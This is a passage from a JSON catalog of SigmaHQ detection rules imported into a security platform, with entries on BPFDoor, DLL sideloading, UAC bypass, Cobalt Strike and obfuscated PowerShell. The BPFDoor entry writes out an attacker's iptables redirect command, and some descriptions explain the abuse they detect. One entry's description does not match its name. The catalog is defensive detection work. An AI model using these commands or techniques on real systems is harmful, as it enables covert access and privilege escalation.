"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" } }, { "id": "sigmahq-sigma-70b4156e-50fc-4523-aa50-c9dddf1993fc", "type": "detection", "name": "Bpfdoor TCP Ports Redirect", "description": "All TCP traffic on particular port from attacker is routed to different port. ex. 
'/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bpfdoor-tcp-ports-redirect.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70b4156e-50fc-4523-aa50-c9dddf1993fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_bpfdoor_port_redirect.yml" } }, { "id": "sigmahq-sigma-70bc5215-526f-4477-963c-a47a5c9ebd12", "type": "detection", "name": "Potential Active Directory Enumeration Using AD Module - ProcCreation", "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dll\" DLL. 
Which is often used by attackers to perform AD enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-active-directory-enumeration-using-ad-module-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml" } }, { "id": "sigmahq-sigma-70e8e9b4-6a93-4cb7-8cde-da69502e7aff", "type": "detection", "name": "VMGuestLib DLL Sideload", "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vmguestlib-dll-sideload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vmguestlib.yml" } }, { "id": "sigmahq-sigma-70ed1d26-0050-4b38-a599-92c53d57d45a", "type": 
"detection", "name": "Bitbucket User Login Failure", "description": "Detects user authentication failure events.\nPlease note that this rule can be noisy and it is recommended to use with correlation based on \"author.name\" field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-user-login-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70ed1d26-0050-4b38-a599-92c53d57d45a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml" } }, { "id": "sigmahq-sigma-70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "type": "detection", "name": "Suspicious Service Installation Script", "description": "Detects suspicious service installation scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-installation-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml" } }, { "id": "sigmahq-sigma-7100f7e3-92ce-4584-b7b7-01b40d3d4118", "type": "detection", "name": "Default Cobalt Strike Certificate", "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/default-cobalt-strike-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" } }, { "id": "sigmahq-sigma-710bdbce-495d-491d-9a8f-7d0d88d2b41e", "type": "detection", "name": "Special File Creation via Mknod Syscall", "description": "Detects usage of the `mknod` syscall to create special files (e.g., character or block devices).\nAttackers or malware might use `mknod` to create fake devices, interact with kernel interfaces,\nor establish covert channels in Linux systems.\nMonitoring the use of `mknod` is important because this syscall is rarely used by legitimate applications,\nand it can be abused to bypass file system restrictions or create backdoors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/special-file-creation-via-mknod-syscall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "710bdbce-495d-491d-9a8f-7d0d88d2b41e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_susp_special_file_creation_via_mknod_syscall.yml" } }, { "id": "sigmahq-sigma-71158e3f-df67-472b-930e-7d287acaa3e1", "type": "detection", "name": "Execution Of Non-Existing File", "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-of-non-existing-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71158e3f-df67-472b-930e-7d287acaa3e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" } }, { "id": "sigmahq-sigma-7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "type": "detection", "name": "Suspicious Kernel Dump Using Dtrace", "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-kernel-dump-using-dtrace.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml" } }, { "id": "sigmahq-sigma-71886b70-d7b4-4dbf-acce-87d2ca135262", "type": "detection", "name": "Suspicious Rejected SMB Guest Logon From IP", "description": "Detects an attempted PrintNightmare (CVE-2021-1675) remote code execution in the Windows Spooler service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rejected-smb-guest-logon-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71886b70-d7b4-4dbf-acce-87d2ca135262", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml" } }, { "id": "sigmahq-sigma-7195a772-4b3f-43a4-a210-6a003d65caa1", "type": "detection", "name": "Suspicious User Agent", "description": "Detects 
suspicious malformed user agent strings in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7195a772-4b3f-43a4-a210-6a003d65caa1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_susp.yml" } }, { "id": "sigmahq-sigma-719c22d7-c11a-4f2c-93a6-2cfdd5412f68", "type": "detection", "name": "Decode Base64 Encoded Text -MacOs", "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/decode-base64-encoded-text-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_base64_decode.yml" } }, { "id": "sigmahq-sigma-71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb", "type": "detection", "name": "Potential Waveedit.DLL Sideloading", "description": "Detects 
potential DLL sideloading of \"waveedit.dll\", which is part of the Nero WaveEditor audio editing software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-waveedit-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_waveedit.yml" } }, { "id": "sigmahq-sigma-71c276aa-49cd-43d2-b920-2dcd3e6962d5", "type": "detection", "name": "Service Installed By Unusual Client - System", "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-installed-by-unusual-client-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml" } }, { 
"id": "sigmahq-sigma-71d65515-c436-43c0-841b-236b1f32c21e", "type": "detection", "name": "Cisco File Deletion", "description": "See what files are being deleted from flash file systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1561.001", "T1561.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71d65515-c436-43c0-841b-236b1f32c21e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_file_deletion.yml" } }, { "id": "sigmahq-sigma-71ff406e-b633-4989-96ec-bc49d825a412", "type": "detection", "name": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/zip-a-folder-with-powershell-for-staging-in-temp-powershell.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71ff406e-b633-4989-96ec-bc49d825a412", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" } }, { "id": "sigmahq-sigma-72124974-a68b-4366-b990-d30e0b2a190d", "type": "detection", "name": "Metasploit SMB Authentication", "description": "Alerts on Metasploit host's authentications on the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/metasploit-smb-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72124974-a68b-4366-b990-d30e0b2a190d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_metasploit_authentication.yml" } }, { "id": "sigmahq-sigma-7215374a-de4f-4b33-8ba5-70804c9251d3", "type": "detection", "name": "Bitbucket Unauthorized Access To A Resource", "description": "Detects unauthorized access attempts to a resource.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1586" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/bitbucket-unauthorized-access-to-a-resource.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7215374a-de4f-4b33-8ba5-70804c9251d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml" } }, { "id": "sigmahq-sigma-724ea201-6514-4f38-9739-e5973c34f49a", "type": "detection", "name": "Bypass UAC Using SilentCleanup Task", "description": "Detects the setting of the environment variable \"windir\" to a non-default value.\nAttackers often abuse this variable in order to trigger a UAC bypass via the \"SilentCleanup\" task.\nThe SilentCleanup task located in %windir%\\system32\\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-using-silentcleanup-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "724ea201-6514-4f38-9739-e5973c34f49a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" } }, { "id": "sigmahq-sigma-725a9768-0f5e-4cb3-aec2-bc5719c6831a", "type": "detection", "name": 
"Suspicious Where Execution", "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1217" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-where-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_where_browser_data_recon.yml" } }, { "id": "sigmahq-sigma-727454c0-d851-48b0-8b89-385611ab0704", "type": "detection", "name": "Lolbin Unregmp2.exe Use As Proxy", "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbin-unregmp2-exe-use-as-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "727454c0-d851-48b0-8b89-385611ab0704", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml" } }, { "id": "sigmahq-sigma-7280c9f3-a5af-45d0-916a-bc01cb4151c9", "type": "detection", "name": "Suspicious MSExchangeMailboxReplication ASPX Write", "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msexchangemailboxreplication-aspx-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml" } }, { "id": "sigmahq-sigma-72862bf2-0eb1-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher - System", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher-system.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72862bf2-0eb1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml" } }, { "id": "sigmahq-sigma-729ce0ea-5d8f-4769-9762-e35de441586d", "type": "detection", "name": "MpiExec Lolbin", "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mpiexec-lolbin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "729ce0ea-5d8f-4769-9762-e35de441586d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml" } }, { "id": "sigmahq-sigma-72a0369a-2576-4aaf-bfc9-6bb24a574ac6", "type": "detection", "name": "Delete Defender Scan ShellEx Context Menu Registry Key", "description": "Detects deletion of registry key that adds 'Scan with Defender' option in context menu. 
Attackers may use this to make it harder for users to scan files that are suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/delete-defender-scan-shellex-context-menu-registry-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72a0369a-2576-4aaf-bfc9-6bb24a574ac6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_defender_context_menu.yml" } }, { "id": "sigmahq-sigma-72af37e2-ec32-47dc-992b-bc288a2708cb", "type": "detection", "name": "Azure New CloudShell Created", "description": "Identifies when a new cloudshell is created inside of Azure portal.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-new-cloudshell-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72af37e2-ec32-47dc-992b-bc288a2708cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml" } }, { "id": "sigmahq-sigma-72ca7c75-bf85-45cd-aca7-255d360e423c", "type": 
"detection", "name": "Potential Chrome Frame Helper DLL Sideloading", "description": "Detects potential DLL sideloading of \"chrome_frame_helper.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-chrome-frame-helper-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_chrome_frame_helper.yml" } }, { "id": "sigmahq-sigma-72cd00d6-490c-4650-86ff-1d11f491daa1", "type": "detection", "name": "Vulnerable Driver Load By Name", "description": "Detects the load of known vulnerable drivers via the file name of the drivers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-driver-load-by-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72cd00d6-490c-4650-86ff-1d11f491daa1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" } }, { "id": "sigmahq-sigma-72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "type": "detection", "name": "Connection Proxy", "description": "Detects setting proxy configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/connection-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" } }, { "id": "sigmahq-sigma-730fc21b-eaff-474b-ad23-90fd265d4988", "type": "detection", "name": "Psexec Execution", "description": "Detects user accept agreement execution in psexec commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "730fc21b-eaff-474b-ad23-90fd265d4988", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
